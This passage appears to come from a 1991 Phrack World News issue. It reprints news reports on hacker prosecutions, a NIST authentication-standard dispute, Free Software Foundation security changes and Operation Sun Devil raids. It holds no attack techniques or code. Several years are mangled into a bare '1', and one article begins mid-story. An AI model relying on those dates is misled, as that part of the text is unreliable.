  2978.      Dr. Dan: The problem that I see is that these people philosophically
  2979. don't see this as a crime.  For most of them this is an intellectual challenge.
  2980.  
  2981.      Male Announcer: That challenge led Dutch students to break into a United
  2982. States Army Computer during operation desert storm.  And as this Japanese
  2983. documentary shows, it led hackers in a New York City to use payphones to commit
  2984. big time rip-offs.  Now it's important to point out that Donald ______, that
  2985. Arizona State University student, has not yet been charged with any crime and
  2986. if he is charged he is innocent until proven guilty.
  2987.  
  2988.      Female announcer: What is the penalty for hacking?
  2989.  
  2990.      Male Announcer: Just for getting into a system when you're not supposed to
  2991. can be up to a year and a half in prison.   But if there is criminal intent to
  2992. steal, to rip-off that system, the penalty can be as high as 10 years in jail
  2993. and a $150,000.00 fine.
  2994.  
  2995. _______________________________________________________________________________
  2996.  
  2997. Computer Hacker Gets Probation                              September 26, 1991
  2998. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2999. Special Thanks: Flaming Carrot (Pittsburgh Post-Gazette)
  3000.  
  3001.      A Mt. Lebanon woman who was able to make thousands of free long-distance
  3002. telephone calls by breaking into voice mail boxes with a touch tone telephone
  3003. has been placed on 10 years probation.  Last Friday, Common Pleas Judge Robert
  3004. E. Dauer ordered Andrea Gerulis, 20, of Castle Shannon Boulevard to make
  3005. restitution of $4,300 to Magee Womens Hospital and $2,516 to Pittsburgh
  3006. Cellular Telephone Co.
  3007.  
  3008.      Gerulis, a Mt. Lebanon High School graduate, was a computer hacker who
  3009. entered telephone computer systems illegally so that she could make telephone
  3010. calls without paying for the service.  Mt. Lebanon police Detective John L.
  3011. Michalec posed as a computer hacker and spent nine months investigating her
  3012. activities, which were done by dialing codes on a touch-tone telephone.
  3013.  
  3014.      After a non-jury trial in May, Dauer convicted her of two counts of theft
  3015. of services and two counts of unlawful use of computers.  Assistant District
  3016. Attorney Thaddeus A. Dutkowski recommended probation because he didn't want
  3017. Gerulis to go to jail, where she could teach inmates how to commit crimes with
  3018. a telephone.  If she were incarcerated, she would have the largest classroom
  3019. environment she could hope for, Dutkowski said.
  3020.  
  3021.      Dauer agreed that inmates already know too much about committing crimes
  3022. with telephones.  Gerulis told Dauer that she was sorry for what she did, that
  3023. when she started, she was doing it for fun.  She was also ordered to continue
  3024. psychological counseling.
  3025. _______________________________________________________________________________
  3026.  
  3027. More Archaic Government Regulations Proposed
  3028. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3029. Special Thanks: Stainless Steal Provider (New York Times)
  3030.  
  3031.      The federal government said Thursday that it would introduce a standard
  3032. for authenticating electronic data later this summer, but the announcement
  3033. prompted an angry reaction from one of the leading private providers of software
  3034. that protects computer data.
  3035.  
  3036.      The company, RSA Data Security Inc. of Redwood City, Calif., said the
  3037. government had failed to address fears about the possibility of a secret "trap
  3038. door," which would permit intelligence and law-enforcement agencies to look at
  3039. private data.
  3040.  
  3041.     The issue of providing special mechanisms to permit government access to
  3042. private information has caused a growing public debate recently.
  3043.  
  3044.     Earlier this year an anti-terrorism bill introduced in Congress called on
  3045. the computer and telecommunication industries to permit federal agencies to
  3046. look at private data.  But the statement was later dropped from the bill after
  3047. extensive public opposition.
  3048.  
  3049.     Government officials said that it would be possible for technical experts
  3050. to examine the standard when it is released this summer and they could decide
  3051. for themselves whether there were any shortcomings in the design of the
  3052. standard.
  3053.  
  3054.     "It will be openly published and people can inspect it to their heart's
  3055. content," said James H. Burrows, head of the computer systems laboratory at the
  3056. National Institute of Standards and Technology.
  3057.  
  3058.     He added that the new standard was not intended to encrypt computer data,
  3059. and that the government would continue to rely on an earlier technology known
  3060. as the Data Encryption Standard to actually hide information from potential
  3061. electronic eavesdroppers.
  3062.  
  3063.     Burrows said there was a project under way to develop a successor to that
  3064. standard, but that it was years away from completion.
  3065. ______________________________________________________________________________
  3066.  
  3067. Computer Whiz Accused Of Illegal Access and Mischief        September 25, 1991
  3068. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3069. by Peter G. Chronis (The Denver Post Page 1 "NASA vs. Hobbyist")
  3070.  
  3071.      An Aurora computer hobbyist who allegedly used a personal computer and his
  3072. home phone to penetrate NASA computers hacked off Uncle Sam enough to be
  3073. indicted on seven federal counts yesterday.  Richard G. Wittman, 24, the
  3074. alleged "hacker," was accused of two felonies, including gaining unauthorized
  3075. access to NASA computers to alter, damage, or destroy information, and five
  3076. misdemeanor counts of interfering with the government's operation of the
  3077. computers.  Wittman allegedly got into the NASA system on March 7, June 11,
  3078. June 19, June 28, July 25, July 30, and Aug. 2, 1.
  3079.  
  3080.      Bob Pence, FBI chief in Denver, said Wittman used a personal computer in
  3081. his home and gained access to the NASA systems over telephone lines. The
  3082. investigation, which took more than a year, concluded that Wittman accessed the
  3083. NASA computer system and agency computers at the Marshall Space flight Center in
  3084. Huntsville, Alabama, and the Goddard Space Flight Center in Greenbelt,
  3085. Maryland.
  3086.  
  3087.      The NASA computers are linked to a system called Telenet, which allows
  3088. qualified people to access government data bases.  A user name and password
  3089. are required to reach the NASA computers.  Federal sources declined to reveal
  3090. more information because the complex case involves "sensitive material."
  3091.  
  3092.      Wittman, a high-school graduate, apparently hadn't worked in the computer
  3093. industry and held a series of odd jobs.  The felony counts against him each
  3094. carry a possible five-year prison term and $250,000 fine.
  3095. _______________________________________________________________________________
  3096.  
  3097. Security Increases
  3098. ~~~~~~~~~~~~~~~~~
  3099. Special Thanks: Stainless Steal Provider (New York Times)
  3100.  
  3101.      The foundation was started by Richard Stallman, who was awarded a MacArthur
  3102. Foundation fellowship in 1.  While mainstream software companies
  3103. have prohibited users from freely copying their programs, Stallman, who is
  3104. widely respected for developing computer languages and software editing tools,
  3105. has argued that information is not the same as other commodities and should be
  3106. shared without cost.
  3107.  
  3108.      His password has been widely known among network users because he has
  3109. refused to keep it secret.  He is bitter about the changes that have
  3110. accompanied the coming of age of computer networks.
  3111.  
  3112.      Last month, after security was increased at the foundation and many users
  3113. were stripped of their guest privileges, Stallman said he considered giving up
  3114. his quest.
  3115.  
  3116.     In the end, he decided that the cause of creating free software was too
  3117. important to abandon, but he said he feels like a pariah.  "Since I won't agree
  3118. to have a real password, I will only be able to log in on the 'inside'
  3119.  machines,"
  3120. he wrote in an electronic message in response to a reporter's query.
  3121.  
  3122.     "I still feel partly ashamed of participating in this. I've been forced to
  3123. choose between two principles, both of which are so important to me that I
  3124. won't accept the loss of either of them."
  3125.  
  3126.      Idealists like Stallman and Ted Nelson, the author of the cult classic
  3127.  "Computer Lib," hoped that the computer revolution wouldn't be like the
  3128. industrial revolution. This time the wealth -- information -- would be free to
  3129. everyone and instant communication would break down the barriers between rich
  3130. and poor and remake mankind.
  3131.  
  3132.      Marvin Minsky, a computer science professor at MIT, said that for 15
  3133. years, beginning in 1963, researchers at the school lived in a paradise,
  3134. sharing computers and networks before a system of password protection was
  3135. installed. Now that has changed.  "It's sad," he said.
  3136.  
  3137.     "But Richard Stallman is living in a dream world.  He has this view that
  3138. his idea of computer ethics will prevail.  But it's not going to happen this
  3139. year or next."
  3140.  
  3141.     Instead of finding community on computer networks, many users are now
  3142. confronted with virus invasions and information theft, leading to the same
  3143. sense of alienation and fear felt by residents of large cities.
  3144.  
  3145.    "At first I thought this was Marshall McLuhan's global village coming to
  3146. reality," said Neil Harris, a manager at General Electric Information Services
  3147. Co., which sets up computer conferences and sells information to about 200,000
  3148. members around the world.
  3149.  
  3150.    "But it's not that at all. It's a lot of people connecting in hundreds of
  3151. small communities based around highly specific interests."
  3152.  
  3153.     Steven Levy, who has written about the early days of computing at MIT, said
  3154. that the demise of the Free Software Foundation's open door policy was
  3155. inevitable.
  3156.  
  3157.    "When you pass the plate around in church you don't expect people to steal
  3158. from it," he said.  "But sooner or later everyone knows that the plate is
  3159. unguarded, and there are always people who don't care about the church.  The
  3160. question is how far do you go to protect it?  Do you lock the church or do you
  3161. send an armed guard around with the plate?"
  3162. ______________________________________________________________________________
  3163.  
  3164. PWN Quicknotes
  3165. ~~~~~~~~~~~~~
  3166. 1.   On June 12, 1991, Sirhackalot's equipment was confiscated by the Southern
  3167.      Bell and the FBI without any charges being filed.  Neither the FBI nor
  3168.      Southern Bell bothered to explain why they were in his home and taking his
  3169.      personal possessions.  Again neither party could tell Sirhackalot what he
  3170.      supposedly did to bring both agency's to his doorstep.  Also busted were
  3171.      Mr.Doo and The Imortal Phreak.  [Special Thanks: The Marauder (404)]
  3172. _______________________________________________________________________________
  3173.  
  3174. 2.   Bill Cook is no longer an assistant United States Attorney in Chicago.  It
  3175.      is unknown how he left his position.  Basic questions go unanswered. Did
  3176.      he quit or was fired?  If he was fired, we'd like to know exactly why.
  3177. _______________________________________________________________________________
  3178.  
  3179. 3.   Wanted:  Targets of Operation Sun Devil
  3180.  
  3181.      Computer Professionals for Social Responsibility (CPSR) is pursuing a
  3182.      lawsuit against the Secret Service seeking the release of information
  3183.      concerning Operation Sun Devil.  In recently filed court papers, the
  3184.      agency claims that the information cannot be disclosed because, among
  3185.      other reasons, disclosure would violate the privacy of those individuals
  3186.      who are the targets of the investigation.  This argument can be overcome
  3187.      if CPSR obtains signed releases from those individuals.  CPSR is
  3188.      requesting the cooperation of anyone who was the subject of a Sun Devil
  3189.      raid on or about May 7, 1.  We are prepared to enter into an attorney-
  3190.      client relationship with individuals responding to this request, so that
  3191.      confidentiality will be assured.
  3192.  
  3193.      Please respond ASAP to:
  3194.  
  3195.                            David Sobel
  3196.                            CPSR Legal Counsel
  3197.                            (202) 544-9240
  3198.                            dsobel@washofc.cpsr.org
  3199. _______________________________________________________________________________
  3200.  
  3201. 4.   Recently Microsoft discovered it was the victim of trespassing.  A
  3202.      security guard noticed two people playing volleyball on the premises and
  3203.      knew that they did not work for Microsoft.  The officer approached the
  3204.      volleyball players and asked them to leave.  The trespassers left.  Later
  3205.      someone asked the security guard how he knew that the people playing
  3206.      volleyball were not Microsoft employees. He replied, "They had tans."
  3207.      [Special Thanks: Psychotic Surfer]
  3208. _______________________________________________________________________________
  3209.  
  3210.  
  3211.